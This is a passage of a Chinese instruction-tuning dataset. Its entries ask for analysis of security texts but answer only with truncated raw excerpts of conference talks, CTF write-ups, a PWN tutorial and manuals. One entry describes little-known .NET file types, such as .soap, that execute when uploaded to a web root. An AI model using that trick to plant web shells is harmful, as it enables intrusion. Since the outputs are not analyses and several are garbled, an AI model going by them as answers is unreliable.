 Learning  知己, LAN device behavior modeling  知彼, Threat intelligence 2015/8/29 HitCon2015: LAN device detection 9 Why LAN device identification  Device identification is not important for traditional IDS/IPS?  Age is changed.  IDS/IPS need to change too. 2015/8/29 HitCon2015: LAN device detection 10 Why LAN device identification  PC 上的 Botnet/Malware 會讓自己看起來越來越 正常例如透過 Dropbox 通訊看Blog等等  這樣比較好規避 AV/IPS/FW. 2015/8/29 HitCon2015: LAN device detection 11 Why LAN device identification  可是其他的智慧家電呢例如冰箱  對 PC 來說是正常的行為對其他的 devices/things 來說可能還是算異常 2015/8/29 HitCon2015: LAN device dete", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCopyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Java Every-days Exploiting Software Running on 3 Billion Devices Brian Gorenc Manager, Vulnerability Researcher Jasiel Spelman Security Researcher  Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Solution Unless it is absolutely necessary to run Java in web browsers, disable it as described below, even after updating to 7u11. This will help mitigate other Java vulnerabilities that may be discovered in the future. - DHS-sponsored CERT  Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 3 Agenda  Introduction  Vulnerability Trending and Attack Surface  Java Sub-component Weaknesses  Leveraging Sub-component Weaknesses  Vendor Response Review  Conclusion  Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Introduction  Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 5 whois Brian Gorenc Employer: Hewlett-Packard Organization: HP Security Research Zero Day Initiative Responsibilities: Manager, Vulnerability Research Running Internets Crashbin Verifying EIP == 0x41414141 Organizing Pwn2Own Free Time: Endlessly Flowing Code Paths That Dont Lead to Vulnerabilities Twitter: @MaliciousInput, @thezdi  Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 6 whois Jasiel Spelman Employer: Hewlett-Packard Organization: HP Security Research Zero Day Initiative Responsibilities: Security Research Staying Current with the Latest Vulnerabilities Cursing at IDA Working During the Evening, Sleeping During the Day Free Time: Jumping Out Of Planes Playing Electric Bass Twitter: @Wanderi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAura A peer-to-peer reputation system Cat Okita Copyright 2003 2 INDEX INDEX ................................................................................................................................................................... 2 ABSTRACT .......................................................................................................................................................... 3 INTRODUCTION................................................................................................................................................ 3 BACKGROUND .................................................................................................................................................. 3 REQUIREMENTS............................................................................................................................................... 4 METHODOLOGY............................................................................................................................................... 5 REPUTATION ...................................................................................................................................................... 5 TEMPLATES AND GOSSIP................................................................................................................................... 5 DESIGN ISSUES.................................................................................................................................................. 6 DESIGN................................................................................................................................................................. 7 IMPLEMENTATION ......................................................................................................................................... 9 CONFIGURATION...........................................................................................................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n/ register_argc_argv boolean Tells PHP whether to declare the argv & argc variables (that would contain the GET information). See also command line. register_argc_argv TRUE Setting this to TRUE means that scripts executed via the CLI SAPI always have access to argc (number of arguments passed to the application) and argv (array of the actual arguments).The PHP variables $argc and $argv are automatically set to the appropriate values when using the CLI SAPI. These values can also be found in the $_SERVER array, for example: [$_SERVER'argv']. PHP register_argc_argv 0x01 CTF register_argc_argv WEB yzddmr6 register_argc_argv register_argc_argv PHP 0x02 register_argc_argv PHP argv argc GET register_argc_argv TRUE CLI SAPI argc argvCLI SAPIPHP $argc $argv $_SERVER $_SERVER['argv'] php.ini register_argc_argv On php ON github Off 5.2.17 On 5.4.455.5.9 7.3.4 Off register_argc_argv Off register_argc_argv <?php error_reporting(0); $a = $_GET['a']; echo $a; var_dump($_SERVER[argv]); var_dump($_SERVER); ?> register_argc_argv register_argc_argv argv argc argv PHP $argv $_SERVER['argv'] $_GET $_POST PHP PHP REQUEST PHP $argv php php argv register_argc_argv CLI $_SERVER['argv'] global $_GLOBALS['argv'] $_SERVER['argv'] $_GLOBALS['argv'] register_argc_argv CLICommand Line Interface SAPI Server Application Programming InterfaceSAPIPHPCLI SAPI CLI SAPIPHPCLI CLIPHPPHP $argv , $argc // test.php <?php var_dump($argc); var_dump($argv); $argc 5 $argv 5 test.php-s-ttest100 $argc $argv test 100 -s -t php getopt() getopt() options: (-) x -x a-z,A-Z,0-9 longopts: () opt --opt optind(>=PHP7.1.0): options php test.php -s -t test 100 getopt ( string $options [, array $longopts [, int &$optind ]] ) : array php getopt.php -apanda -chello -b next -dooo getopt(options) options / FALSE options key value false options getopt() test 100 -s -t 0x03 <?php // getopt.php $test = getopt('a:b:c:de'); var_dump($test); // newtest.php <?php $argv = getopt('s:t:'); var_dump($argc); var_dump($argv); 0x03 $_GET $_", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Drink Me * Category: Web * 150 Points * Solved by the JCTF Team ## Description > Alice can't fit through the little door to get into the beautiful garden because she is too big. > Suddenly she notices a glass bottle has magically appeared on the table. > It has a pink label that says \"DRINK ME\" tied around it. > Drinking from the bottle will hopefully shrink her. > > So come on, hurry up, before it's too late. ## Solution We visit the attached website and are greeted with a simple interactive game starring Alice from Wonderland. On the table next to here are a key and a potion labeled \"Drink Me\". If we click the key, the game says \"Too Big!\". We can drink the potion and shrink a bit, but even after shrinking, clicking the key still says \"Too Big!\" (and the potion is gone). Let's check the sources: ```javascript // version 2.0 $(document).ready(() => { getSize(); $(\"#key\").on(\"click\", function() { useKey(); }); $(\"#reset\").on(\"click\", async () => { await fetch('/api/reset', { method: 'GET', }).then(() => location.reload()) }); }); const getSize = async () => { await fetch('/api/getsize', { method: 'GET', }) .then((response) => response.json() .then((resp) => { if (response.status == 200) { $('#alice').css('transform', 'scale(' + `${1/(Math.sqrt(resp.size))}` + ')'); if (!resp.shrinked) { const potionDiv = document.createElement(\"div\"); potionDiv.setAttribute(\"id\", \"potion\"); potionDiv.setAttribute(\"class\", \"potion\"); const potionImg = document.createElement(\"img\"); potionImg.setAttribute(\"src\",\"../static/images/potion.png\") potionDiv.appendChild(potionImg); document.getElementById(\"table-wrapper\").appendChild(potionDiv); $(\"#potion\").on(\"click\", function() { drink(); }); } return; } })) .catch((error) => { console.log(error); }); } const drink = async () => { await fetch('/api/drink', { method: 'POST', headers: { 'Content-Type': 'application/json', }, body: JSON.stringify({ shrink: '2x'}), }) .then((resp) => { if (resp.status == 200) { getSize(); $('#potion').fadeO", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n7.27.2012 frak.redballoonsecurity.com R E D BALLOON S e c u r i t y { Ang Cui | a@redballoonsecurity.com } www.redballoonsecurity.com FIRMWARE R E V E R S E A N A L Y S I S K O N S O L E W H O A M I W H A T D O I D O 7.27.2012 frak.redballoonsecurity.com a@redballoonsecurity.com W H O A M I W H A T D O I D O 5th Year Ph.D. Candidate Intrusion Detection Systems Lab Columbia University 7.27.2012 frak.redballoonsecurity.com a@redballoonsecurity.com 5th Year Ph.D. Candidate Intrusion Detection Systems Lab Columbia University Co-Founder and CEO Red Balloon Security Inc. www.redballoonsecurity.com 7.27.2012 frak.redballoonsecurity.com W H O A M I W H A T D O I D O a@redballoonsecurity.com 5th Year Ph.D. Candidate Intrusion Detection Systems Lab Columbia University Co-Founder and CEO Red Balloon Security Inc. www.redballoonsecurity.com Past publications:  Pervasive Insecurity of Embedded Network Devices. [RAID10]  A Quantitative Analysis of the Insecurity of Embedded Network Devices. [ACSAC10]  Killing the Myth of Cisco IOS Diversity: Towards Reliable Large-Scale Exploitation of Cisco IOS. [USENIX WOOT 11]  Defending Legacy Embedded Systems with Software Symbiotes. [RAID11]  From Prey to Hunter: Transforming Legacy Embedded Devices Into Exploitation Sensor Grids. [ACSAC11] 7.27.2012 frak.redballoonsecurity.com W H O A M I W H A T D O I D O a@redballoonsecurity.com 5th Year Ph.D. Candidate Intrusion Detection Systems Lab Columbia University Co-Founder and CEO Red Balloon Security Inc. www.redballoonsecurity.com Past Embedded Tinkerings:  Interrupt-Hijack Cisco IOS Rootkit 7.27.2012 frak.redballoonsecurity.com W H O A M I W H A T D O I D O a@redballoonsecurity.com Interrupt-Hijack Rootkit [blackhat USA 2011] 7.27.2012 frak.redballoonsecurity.com a@redballoonsecurity.com 5th Year Ph.D. Candidate Intrusion Detection Systems Lab Columbia University Co-Founder and CEO Red Balloon Security Inc. www.redballoonsecurity.com Past Embedded Tinkerings:  Interrupt-Hijack Cisco IOS Rootk", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n边信道攻击实战 Kevin2600 . Kevin2600 . 专注无线电; 嵌入式设备安全研究 . NewSky 安全研究员 + 安全培训讲师 . 坚信黑客精神就是不断探索未知领域 边信道的传说? 边信道的传说? . Side-Channel 必须掌握很深的数学知识? . Side-Channel 必须使用昂贵的硬件设备? . Side-Channel 都有哪些实战中的运用 . Side-Channel 作为小白该如何开始 Contents:  边信道的那点事  边信道案例  EM Leaking  边信道案例  Timing Attack  边信道案例  Fault Injection Attack  边信道案例  Power Analysis & Glitch Attack 边信道的那点事 二战期间盟军的一名研究人员发现他的示波器经常有莫名 的噪音. 调查发现信号来源于隔壁房间的某台加密机. 在深 入研究后, 这名研究员成功地将被加密前的明文信息从噪 音中提取出来. 故事起源: WHAT ? 边信道攻击是一种针对软件或硬件设计缺陷, 剑走偏锋的攻击方式 攻击途径通常采用被动式监听, 或通过特殊渠道发送隐蔽数据信号 攻击点不在暴力破解或算法分析, 而是通过功耗; 时序; 电磁泄漏等方 式达到破解目的. 在很多物理隔绝的环境中, 往往也能出奇制胜 WHY ? . Public key signature check . Bootloader 加固 (bootdelay = 0) . 屏蔽调试端口 UART; JTAG; SPI; I2C . 电子设备全部物理隔离 (Air Gapping) HOW ? . 简单功耗分析 (Simple power analysis) . 差分功耗分析 (Differential power analysis) . 需要通过明文或密文触发加密机制运行 . 需要知道用何种加密方式 (AES128; RSA; 3DES) . 功耗数据提取必须在目标加解密的过程中 : 声波信号采集还原打印机原文 : 美国 NSA 电磁波监听 (TEMPEST) : 功耗分析破解南韩公交卡密钥系统 (3DES) : 功耗分析获取 Philipe Hue 智能灯系统密钥 (AES) : 通过测量分析电磁发射获取 GnuPG 密钥信息 (RSA) : 通过声波远程获取物理隔离网络中的数据 (Funtenna) 被动式: : Xbox360 Glitch 攻击 (运行 unsigned code) : 智能网关 Hue NAND Glitch (得到 Root 权限) : 腾讯玄武激光发指令到二维码读取器 (Bad Barcode) : 浙江 & Michigan 大学通过声波干扰视频监控硬盘存储 : 以色列 Ben-Gurion 大学通过 USB 发送电磁信号 (USBee) : Osmo-fl2k 软件无线电发送 FM; GSM; UMTS 与 GPS 信号 主动式: 边信道案例  EM leaking 电磁波 101  电磁波是电磁场的运动形态, 属于能量的一种  自身温度大于绝对零度物体, 都可以发射电磁波  电磁波应用广泛微波炉; 移动通信; 无线卫星通信  电子设备产生电磁波, 对无线电设备造成信号干扰 视频演示 电磁泄漏隐患 . 电子设备利用电磁波信号, 发射信息内容从而 泄漏机密 (Soft-Tempest) . 电子设备电磁信号可被解码并还原, 达到远程 监控目的 (Hard-Tempest) . 美国NSA 和北约组织制定安全标准, 要求对涉 密设备进行电磁屏蔽, 并严格限制泄漏电磁辐 射的强度 视频演示 电磁信号分析 . Tel Aviv 大学科研人员通过测量分析电磁发 射获取 GnuPG 密钥信息 . 电磁波可通过H探头和便宜的软件无线电 设备远程获取 . 芯片解密过程中执行的计算量不同, 所需电 量也不同 . 芯片01转换产生电磁波从空气中泄漏, 其 中包含密钥指纹信息 电磁注入 . EMP-Jammer 高能电磁场发射器 (危险!!!) . 瞬间大量电流通过导体将产生高能电磁场 . 电磁注入将造成电子设备故障或意外惊喜 ;) . 将设备放入塑料袋或铝箔包裹可防止电磁攻击 视频演示 边信道案例  Timing Attack 密码比对 时序攻击 . 仅需普通示波仪即可完成攻击 . 密码位输错给予相对反应 (LED 灯亮 . 不安全的函数 memcmp() (单字节比对) . 密码位比对的时间越久, 猜中可能性越大 . 降低猜测空间 (6*6*6*6*6*6 = 46656 ) --> (6+6+6+6+6+6 = 36) 时序攻击 视频演示 边信道案例  Fault Injection Got Ro", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"VACUUMDB\" \"1\" \"2003-11-02\" \"Application\" \"PostgreSQL Client Applications\" .SH NAME vacuumdb \\- 收集垃圾并且分析一个PostgreSQL 数据库 .SH SYNOPSIS .sp \\fBvacuumdb\\fR\\fR [ \\fR\\fB\\fIconnection-option\\fB\\fR...\\fB \\fR\\fR]\\fR \\fR[\\fR \\fB--full\\fR\\fR | \\fR\\fB-f\\fR\\fR ]\\fR \\fR[\\fR \\fB--verbose\\fR\\fR | \\fR\\fB-v\\fR\\fR ]\\fR \\fR[\\fR \\fB--analyze\\fR\\fR | \\fR\\fB-z\\fR\\fR ]\\fR\\fR [ \\fR\\fB--table | -t \\fItable\\fB\\fR [ \\fB( \\fIcolumn\\fB [,...] ) \\fR]\\fB \\fR\\fR]\\fR\\fR [ \\fR\\fB\\fIdbname\\fB \\fR\\fR]\\fR \\fBvacuumdb\\fR\\fR [ \\fR\\fB\\fIconnection-options\\fB\\fR...\\fB \\fR\\fR]\\fR \\fR[\\fR \\fB--all\\fR\\fR | \\fR\\fB-a\\fR\\fR ]\\fR \\fR[\\fR \\fB--full\\fR\\fR | \\fR\\fB-f\\fR\\fR ]\\fR \\fR[\\fR \\fB--verbose\\fR\\fR | \\fR\\fB-v\\fR\\fR ]\\fR \\fR[\\fR \\fB--analyze\\fR\\fR | \\fR\\fB-z\\fR\\fR ]\\fR .SH \"DESCRIPTION 描述\" .PP \\fBvacuumdb\\fR 是一个用于整理 PostgreSQL 数据库的工具 vacuumdb 还将会生成用于 PostgreSQL 查询优化器的内部统计数据 .PP \\fBvacuumdb\\fR 是 SQL 命令 VACUUM [\\fBvacuum\\fR(7)] 的封装 因此用哪种方法清理数据库都没什么特别的 .SH \"OPTIONS 选项\" .PP \\fBvacuumdb\\fR 接受下列命令行参数 .TP \\fB-a\\fR .TP \\fB--all\\fR 清理所有数据库 .TP \\fB[-d] \\fIdbname\\fB\\fR .TP \\fB[--dbname] \\fIdbname\\fB\\fR 声明要被清理或分析的数据库名称 如果没有声明这个参数并且没有使用 -a或 --all 那么从环境变量 PGDATABASE 里读取数据库名 如果那个也没有设置则使用连接的用户名 .TP \\fB-e\\fR .TP \\fB--echo\\fR 回显 vacuumdb 生成的查询并且把它发送到服务器 .TP \\fB-f\\fR .TP \\fB--full\\fR 执行\"完全\"清理 .TP \\fB-q\\fR .TP \\fB--quiet\\fR 不显示响应 .TP \\fB-t \\fItable\\fB [ (\\fIcolumn\\fB [,...]) ]\\fR .TP \\fB--table \\fItable\\fB [ (\\fIcolumn\\fB [,...]) ]\\fR 只是清理或分析 table 字段名称只是在与 --analyze 选项联合使用时才需要声明 .sp .RS .B \"Tip:\" 提示: 如果你声明了要清理的字段你可能不得不在 shell 上逃逸圆括弧见下面的例子 .RE .sp .TP \\fB-v\\fR .TP \\fB--verbose\\fR 在处理过程中打印详细信息 .TP \\fB-z\\fR .TP \\fB--analyze\\fR 计算用于优化器的该数据库的统计值 .PP .PP \\fBvacuumdb\\fR 还接受下面的命令行参数用于联接参数 .TP \\fB-h \\fIhost\\fB\\fR .TP \\fB--host \\fIhost\\fB\\fR 声明运行服务器的机器的主机名 如果主机名以斜扛开头则它被用做到 Unix 域套接字的路径 .TP \\fB-p \\fIport\\fB\\fR .TP \\fB--port \\fIport\\fB\\fR 声明服务器在侦听联接的 TCP 端口号或一个本地的 Unix 域套接字文件句柄 .TP \\fB-U \\fIusername\\fB\\fR .TP \\fB--username \\fIusername\\fB\\fR 进行联接的用户名 .TP \\fB-W\\fR .TP \\fB--password\\fR", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nbaesystems.com/SWIFT Follow the Money Understanding the money laundering techniques that support large-scale cyber-heists Follow The Money 2 // 28 1. Summary SWIFT plays a key role in helping its community to reinforce and safeguard the integrity of the global financial ecosystem, and maintains a relentless focus on security. As part of that focus, SWIFT has an ongoing commitment to intelligence sharing and thought leadership that contribute to the communitys understanding of the cyber threat and tactics of cyber criminals. One area where the community has expressed interest in gaining more insight is around the approaches cyber criminals use to extract money once they have executed a successful attack. With this in mind, SWIFT commissioned BAE Systems to research and write this report. Its aim is to illuminate the tactics and techniques used by cyber criminals to cash out so that the SWIFT community can better protect itself, through both cybersecurity controls and financial crime compliance processes. Large scale cyber heists, in which cyber-attackers manage to steal significant amounts of money from banks, continue to create news headlines. Various reports have been produced previously on how some of these attacks, such as those against banks high-value payment systems, succeed and how organisations can mount better defences. BAE Systems and SWIFT have jointly published reports on cyber heist techniques used against financial institutions and the evolution of the cyber threat to the banking community in 2017¹ and 2019² respectively. However, to date, there has not been significant material published on what happens to funds after they have been stolen. This report focuses on that area, specifically the money laundering related activities necessary for cyber-attackers to not only conduct and cash out a successful attack but also avoid the money subsequently being traced. This report describes how money laundering is typically performed in the context of large-scal", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# PWN --- **相关工具** - pwntools ```bash 如何验证 pwntools 安装成功 python 进入交互导入 pwn 库出现如下字符证明 pwntools 安装成功 python3 >>> from pwn import * >>> asm(\"xor eax,eax\") b'1\\xc0' ``` - [pwndbg/pwndbg](https://github.com/pwndbg/pwndbg) ``` git clone https://github.com/pwndbg/pwndbg.git cd pwndbg echo \"source ~/pwndbg/gdbinit.py\" >> ~/.gdbinit ./setup.sh ``` - [david942j/one_gadget](https://github.com/david942j/one_gadget) --- ## 基础部分 ### ELF文件 ELF文件有三种类型可以通过ELF Header中的 e_type 成员进行区分 * 可重定位文件Relocatable File ETL_REL一般为.o文件可以与其他目标文件链接来创建可执行文件或共享目标文件的代码和数据静态链接库属于可重定位文件 * 可执行文件Executable File ET_EXEC可以执行的一个程序此文件规定了exec()如何创建一个程序的进程映像 * 共享目标文件Shared Object File ET_DYN一般为.so文件 ### 动态链接和静态链接 链接可以分为静态链接和动态链接俩种gcc默认使用动态链接添加-static即可指定为静态链接这一阶段将目标文件及其依赖库进行链接生成可执行文件主要包括地址和空间分配符号绑定和重定位等操作 linux下动态链接文件 .so - ida打开动态链接文件function里粉色的函数只是一个符号并没有函数具体实现,符号去解析动态链接库里的函数 静态链接文件 .a - ida打开的静态链接function的函数都有函数体实现,并且函数有父函数的实现 ```sh gcc -fno-pie test.o -o test -static 静态链接并且关掉pie gcc -fno-pie -o dytest test.c 动态链接,并且关掉pie ``` ### 部分寄存器的功能 **32位架构下寄存器功能** EIP 存放当前执行的指令的地址 ESP 存放当前栈帧的栈顶地址 EBP 存放当前栈帧的栈底地址 EAX 通用寄存器存放函数返回值 EBX \"基地址\"(base)寄存器, 在内存寻址时存放基地址 ECX 计数器(counter), 是重复(REP)前缀指令和LOOP指令的内定计数器 ESI/EDI 分别叫做\"源/目标索引寄存器\"(source/destination index),因为在很多字符串操作指令中, DS:ESI指向源串,而ES:EDI指向目标串. ### 常用的汇编指令 | 指令 | 等同于 | | ---- | ------ | |call func| push pcjmp func| |leave| mov esp ebppop ebp| |ret| pop pc (相当于在栈顶弹出一个数据赋值给EIP寄存器)| |push xxx| 将xxx压栈将esp减4| |pop rdi| 弹栈将此时esp所指内容存入rdi同时esp加4| ### 栈的工作方式 ### linux的保护机制 * RELRO: Full RELRO - 重定向RELRO会有Partial RELRO和FULL RELRO如果开启FULL RELRO意味着我们无法修改got表 * Stack: No canary found - 栈canary检查 * NX: NX enabled - 栈不可执行 * PIE: PIE enabled - 程序地址随机化 * ASLRAddress space layout randomization - 内存地址随机化 --- ## 工具使用 ### gdb的使用 * vmmap查看虚拟内存空间 * break下断点 * del删除断点 * run运行整个程序 * continue继续运行 * start和b main然后run差不多 * n单步步过 * s单步步入 * ni单步步过汇编层面 * si单步步入汇编层面 * bt栈回溯 * x查看内存 * x/nfu <addr> * n,f,u都是可选参数指要显示的内存的格式 * n 代表个数要显示多少单位的内存 * u 代表单位大小b 表示单字节h代表双字节w表示四字节g表示八字节 * x 代表显示格式常用的格式有 x十六进制s字符串i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n先放上一个图示 方便理解 然后放上目录结构 1 application 应用目录可设置 2  common 公共模块目录可更改 3  index 模块目录(可更改) 4   config.php 模块配置文件 5   common.php 模块函数文件 6   controller 控制器目录 7   model 模型目录 8   view 视图目录 9    ... 更多类库目录 10  command.php 命令行工具配置文件 11  common.php 应用公共函数文件 12  config.php 应用公共配置文件 13  database.php 数据库配置文件 14  tags.php 应用行为扩展定义文件 15  route.php 路由配置文件 16 extend 扩展类库目录可定义 17 public WEB 部署目录对外访问目录 18  static 静态资源存放目录(css,js,image) 19  index.php 应用入口文件 20  router.php 快速测试文件 21  .htaccess 用于 apache 的重写 22 runtime 应用的运行时目录可写可设置 23 vendor 第三方类库目录Composer 24 thinkphp 框架系统目录 25  lang 语言包目录 26  library 框架核心类库目录 27   think Think 类库包目录 28   traits 系统 Traits 目录 29  tpl 系统模板目录 30  .htaccess 用于 apache 的重写 31  .travis.yml CI 定义文件 32  base.php 基础定义文件 33  composer.json composer 定义文件 34  console.php 控制台入口文件 35  convention.php 惯例配置文件 36  helper.php 助手函数文件可选 37  LICENSE.txt 授权说明文件 38  phpunit.xml 单元测试配置文件 39  README.md README 文件 40  start.php 框架引导文件 41 build.php 自动生成定义文件参考 42 composer.json composer 定义文件 43 LICENSE.txt 授权说明文件 44 README.md README 文件 45 think 命令行入口文件 入口文件为public目录下的index.php 程序或许有一个或者多个入口文件入口文件 一般 首先会检测程序安装情况 定义一些环境变量网站路径等定义应用目录最后一步为加 载框架引导文件 首先进入start.php 一进去就加载了base.php base.php里面做的事情可就多了 1.载入Loader类 thinkPHP5.0真正实现了按需加载所有类库采用自动加载机制并且支 持类库映射和composer类库的自动加载自动加载的实现由think\\Loader类库完成自动 加载规范符合PHP的PSR-4 关于Loader类有一个比较重要的方法这里强调一下 2.注册环境变量 3.注册自动加载 以及错误异常处理机制 4.最后一点着重说一下Config的初始化 base.php最后一句话初始化了Config调用了 config类的set方法 其实是加载了convention.php文件 它返回了一个数组 到这里base.php文件执行完毕我们回到start.php中 App::run()->send(); 执行应用这 时候就可以跟进App类了我们跟进run()方法 run方法的默认参数是一个request对象 如果请求不为空 就处理这个请求 如果传入的参数 为空 则先进入Request instance 初始化出一个请求对象 然后调用自身的initcCommon initCommon又调用了init 最后返回Config::get()又一次初 始化了config ,这里注意下我们知道tp嘚每个模块应用都有单独的配置文件所以这里 实现的就是除了加载总的配置文件还要把应用单独的配置文件初始化 接下来的流程我们看 源码嘚注释就可以了解大概了 接下来我们重点关注一个一个变量 $dispatch 它是关键的调度信息用于路由到具体的模 块方法router主要处理后的url就存储在这个变量中 这里先进行路由检测 如果没设置路由规则 就调用tp默认的访问方式 parseurl()返回解析出 来的dispatch 解析出url将目前的dispatch值赋值到request对象中request对象获取到当前请求的调 度信息 可以看到 requests类页游自己的dispatch变量  然后看tp自己的注释", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMac OS X Server Windows Services Administration For Version 10.3 or Later 034-2356_Cvr 9/12/03 10:28 AM Page 1  Apple Computer, Inc.  2003 Apple Computer, Inc. All rights reserved. The owner or authorized user of a valid copy of Mac OS X Server software may reproduce this publication for the purpose of learning to use such software. No part of this publication may be reproduced or transmitted for commercial purposes, such as selling copies of this publication or for providing paid for support services. Every effort has been made to ensure that the information in this manual is accurate. Apple Computer, Inc., is not responsible for printing or clerical errors. The Apple logo is a trademark of Apple Computer, Inc., registered in the U.S. and other countries. Use of the keyboard Apple logo (Option-Shift-K) for commercial purposes without the prior written consent of Apple may constitute trademark infringement and unfair competition in violation of federal and state laws. Apple, the Apple logo, AppleScript, AppleShare, AppleTalk, ColorSync, FireWire, Keychain, Mac, Macintosh, Power Macintosh, QuickTime, Sherlock, and WebObjects are trademarks of Apple Computer, Inc., registered in the U.S. and other countries. AirPort, Extensions Manager, Finder, iMac, and Power Mac are trademarks of Apple Computer, Inc. Adobe and PostScript are trademarks of Adobe Systems Incorporated. Java and all Java-based trademarks and logos are trademarks or registered trademarks of Sun Microsystems, Inc. in the U.S. and other countries. Netscape Navigator is a trademark of Netscape Communications Corporation. 034-2356/09-20-03 LL2356.book Page 2 Thursday, September 4, 2003 3:21 PM 3 3 Contents Preface 7 About This Guide 7 Using This Guide 8 Getting Additional Information Chapter 1 11 Overview of Windows Services 12 Providing a PDC for Domain Login 12 Providing Home Directories and Roaming User Profiles 13 Joining a PDC as a Domain Member 13 Providing File, Print, Browsing, and Name Resolution Se", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.NET 下的种可执件 在net中,较常的种脚本后戳名有,aspx,ashx,asmx,svc等等(asp等其实并不是由net程序去处理) 在net程序中所有未预编译的程序最终都会进BuildManager, System.Web.Compilation.BulidManager 负责 整站的动态编译 如果开发者在程序根录的 PrecompiledApp.config 中设置了不更新编译内容后,那么最终在 BuildManager 的 GetVPathBuildResultInternal 法中会进判断如果户设置了禁更新编译内容且此时程序内置变 量 allowBuildInPrecompile 为false反向为true那么就会抛出程序未预编译的异常 不同后戳的程序会交给不同的handler进处理这些handler最终都会向GetVPathBuildResultInternal,来 判断程序是否需要编译 多数handler在进GetVPathBuildResultInternal时对allowBuildInPrecompile的赋值都是false 因此判断后戳程序是否为可执程序,只需要跟进其处理的handler,看它最终是否会进 GetVPathBuildResultInternal或者些其他动态编译法就可以 在net.framework框架初始的web.config就定义了些件的处理handler 件路径:C:\\Windows\\Microsoft.NET\\Framework64{version}\\Config\\Web.config 如常种件类型所对应的处理handler aspx -> System.Web.UI.PageHandlerFactory ashx -> System.Web.UI.SimpleHandlerFactory asmx -> System.Web.Script.Services.ScriptHandlerFactory svc -> System.ServiceModel.Activation.HttpHandler 通过初始web.config中可以看到net程序中其实还有很多可执程序的件类型 如较冷,且鲜为知的种类型: rem -> System.Runtime.Remoting.Channels.Http.HttpRemotingHandlerFactory soap -> System.Runtime.Remoting.Channels.Http.HttpRemotingHandlerFactory xamlx -> System.Xaml.Hosting.XamlHttpHandlerFactory 这主要讲解soap,可rem和soap的处理handler其实是同个,在 HttpRemotingHandlerFactory 的 GetHandler 法中当请求法为GET且件真实存在时会先交由 WebServiceHandlerFactory 去处理 后续也会调 GetCompiledType 法进 BulidManager 对件内容进动态编译处理 soap本身实现的是种远程服务在写法上soap和asmx类似soap需要继承 MarshalByRefObject , asmx则继承 WebService 如Demo: <%@ WebService Language=\"C#\" Class=\"Test\" %> using System; using System.Web; using System.IO; using System.Net; using System.Text; using System.Data; using System.Data.SqlClient; using System.Collections.Generic; using System.Diagnostics; using System.Web.SessionState; using System.Web.Services; using System.Xml; using System.Web.Services.Protocols; public class Test : MarshalByRefObject { [WebMethod(Description=\"Test\")] public string Chopper(String name) { return name; } } 上传到web根录就可以直接运因为soap格式的处理在net框架的web.config中就已经声明了除户 定义了后戳的处理handler或者删掉了不需要使的handler在net中默认可以使.soap后戳的可执程序 在调上,soap和as", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAND OTHER FUN TRICKS Snide / Owen @LinuxBlog github.com/PhreakMe (Latest Slides & Code) Mandatory Disclaimer The opinions expressed in this presentation and on the following slides are solely those of the presenter. There is no guarantee on the accuracy or reliability of the information provided herein. All Service Marks, Trademarks, and Copyrights belong to their respective owners. This is for educational purposes only Introduction  History / Evolution  Anatomy  How to test  Issue Types  Fun Stuff About Me Presentations Fun Moved to US in 2000. So who uses Phones? What industries? Particularly interesting are: banking/finance Healthcare Insurance Utilities Government Military. History Sorry, Wrong number DC23 Exploding The Phone (Book) 2013. History https://en.wikipedia.org/wiki/Dial-up_Internet_access History 1996 ICQ, NetMeeting, SMS (UK) 1997 AIM 1998 Yahoo Messenger 1999 MSN Messenger & Asterisk 2001 TeamSpeak & MMS 2002 Yahoo Messenger Chat 2003 Skype Released - MySpace 2004 Facebook 2005 YouTube 2007 iPhone Recent History  Hangouts  FB Messenger  Signal  Screen Sharing  LiveStreaming  WhatsApp  SnapChat  Kik  etc etc. PBXs Why do people run PBXs?  Reduce Costs  Cheap Calling  \"Apps  Voicemail  IVRs  Conferencing  Directories Basic Deployment PBX SoftPhone SIP Phone ATA Phone Common Deployment Provider Provider Location A Location B PBX Large Deployments  Translations  Voice Biometrics  2FA  Mobile  Forwarding  BYOD  Apps  Softphones / Skype More Tech  Call Monitoring  Voicemail Transcribing  Call center / Queue  Ring Groups  Call Backs  Portals  Reporting and Analytics DTMF http://www.genave.com/dtmf.htm https://en.wikipedia.org/wiki/Dual-tone_multi-frequency_signaling Dual Tone Multi Frequency Can be easily generated Common Protocols  SIP  RTP  XMPP  IAX Codecs  G.711  ITU- T  PCM  Alaw  Ulaw  G.711.0  G.711.1  g.722  GSM How? Step 1) Figure out what youre testing Testing Scope Blackbox / Whitebox? Info Gathering Testing Info Gathering  OSINT  Grab Phone Num", 